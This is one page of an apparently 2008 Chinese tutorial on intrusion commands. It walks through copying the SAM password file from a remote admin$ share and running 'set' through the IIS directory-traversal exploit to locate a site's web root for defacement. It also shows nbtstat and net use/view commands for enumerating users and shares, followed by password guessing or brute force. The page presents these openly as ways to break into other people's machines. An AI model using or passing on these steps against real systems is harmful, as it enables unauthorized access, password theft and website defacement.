设为首页
收藏本站
广告联系
网站地图
首页 | 免费空间 | 免费域名 | 免费QQ | 免费邮箱 | 免费相册 | 免费短信 | 免费统计 | 免费序列号 | 有奖活动 | 其它免费 | 站长资讯 | 攻略秘籍 | 公告
文章搜索
  您的位置:随便免费资源网站长资讯网络安全 → 正文
入侵命令详解(3)
作者: 风允帆  时间: 2008-05-03  人 气: 22
本文章共7995字,分6页,当前第3页,快速翻页:
 

    ---------------------- ----------------------
    下面就把127.0.0.1的数据库复制到本地C盘下
    copy \\127.0.0.1\admin\$\repair\sam._ c:\
    这个sam._这明显是NT主机的口令档,如果是win2000机器的口令文件应该是sam
    ---------------------------------------------------------------------------------------------------------------------------
    6:set
    如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!

    下面是我得到的结果!我来分析它,只是找主页在那而已。
    COMPUTERNAME=PENTIUMII
    ComSpec=D:\WINNT\system32\cmd.exe
    CONTENT_LENGTH=0
    GATEWAY_INTERFACE=CGI/1.1
    HTTP_ACCEPT=*/*
    HTTP_ACCEPT_LANGUAGE=zh-cn
    HTTP_CONNECTION=Keep-Alive
    HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
    HTTP_ACCEPT_ENCODING=gzip, deflate
    HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    NUMBER_OF_PROCESSORS=1
    Os2LibPath=D:\WINNT\system32\os2\dll;
    OS=Windows_NT
    Path=D:\WINNT\system32;D:\WINNT
    PATHEXT=.COM;.EXE;.BAT;.CMD
    PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
    PROCESSOR_ARCHITECTURE=x86
    PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
    PROCESSOR_LEVEL=6
    PROCESSOR_REVISION=0303
    PROMPT=\$P\$G
    QUERY_STRING=/c+set
    REMOTE_ADDR=XX.XX.XX.XX
    REMOTE_HOST=XX.XX.XX.XX
    REQUEST_METHOD=GET
    SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
    SERVER_NAME=XX.XX.XX.XX
    SERVER_PORT=80
    SERVER_PORT_SECURE=0
    SERVER_PROTOCOL=HTTP/1.1
    SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
    SystemDrive=D:
    SystemRoot=D:\WINNT
    TZ=GMT-9
    USERPROFILE=D:\WINNT\Profiles\Default User
    windir=D:\WINNT
    粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定 会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就 是主页的名称了。
    ---------------------------------------------------------------------------------------------------------------------------
    7:nbtstat
    如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!
    现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。
    命令是
    nbtstat -A XX.XX.XX.XX
    -A一定要大写哦。
    这个我认为大不大写没有太大差别,用处还是一样的。
    之后用net use \\对方IP  连接一下!
    net view \\对方IP  查看对方共享文件夹
    net use X: \\IP\对方共享文件    映\*对方共享文件夹成为本机的X盘
    这就是139端口的基本用法!不过前提是必须对方开共享!
    netstat -n看看谁连接你
    -----------------
      下面是得到的结果。
    NetBIOS Remote Machine Name Table
    Name Type Status
    ---------------------------------------------
    Registered Registered Registered Registered Registered Registered Registered Reg
    istered Registered Registered Registered
    MAC Address = 00-E0-29-14-35-BA


阅读更多内容上一页 · 1 · 2 · 3 · 4 · 5 · 6 · 下一页

相关文章:  
·Trojan.DL.Agent.vp 病毒手动清除...
·“VB木马点击器变种ZXY”病毒
·关于病毒常识的问题
·关于使用影子系统后中病毒的问题
·教你手动查杀Trojan.StartPage.x...
·"瑞星仇恨者"病毒详细分析
·教你手动清除file.exe病毒
·天网安全在线推出全国首个免费在...
·让你的U盘永远隔离木马病毒
·剑盟中国论坛,开放注册中,需要...
·教你自己动手清除file.exe病毒
·卡巴斯基6.0/7.0添加/删除Key的方...
·LYLoader病毒历险记
·跟警察叫板 19岁黑客攻击公安网站...
·防范内部人员从五个途径破坏网络
相关评论:
热门文章
·清除wincom.exe病毒
·趋势科技杀毒软件2008全年免费使
·开机找不到指定模块***.dll文件的
·卡巴斯基6.0/7.0添加/删除Key的方
·2007年全球十二大防火墙排行榜
推荐文章
·测试一下你的杀毒软件是不是垃圾
·高人评四大杀毒软件(卡巴 麦咖啡
·2007年全球十二大防火墙排行榜
·如何巧妙从进程信息中判断病毒和
·局域网IP地址冲突的原因及其解决
新增文章
·防范内部人员从五个途径破坏网络
·跟警察叫板 19岁黑客攻击公安网站
·LYLoader病毒历险记
·卡巴斯基6.0/7.0添加/删除Key的方
·教你自己动手清除file.exe病毒
 
广告位招租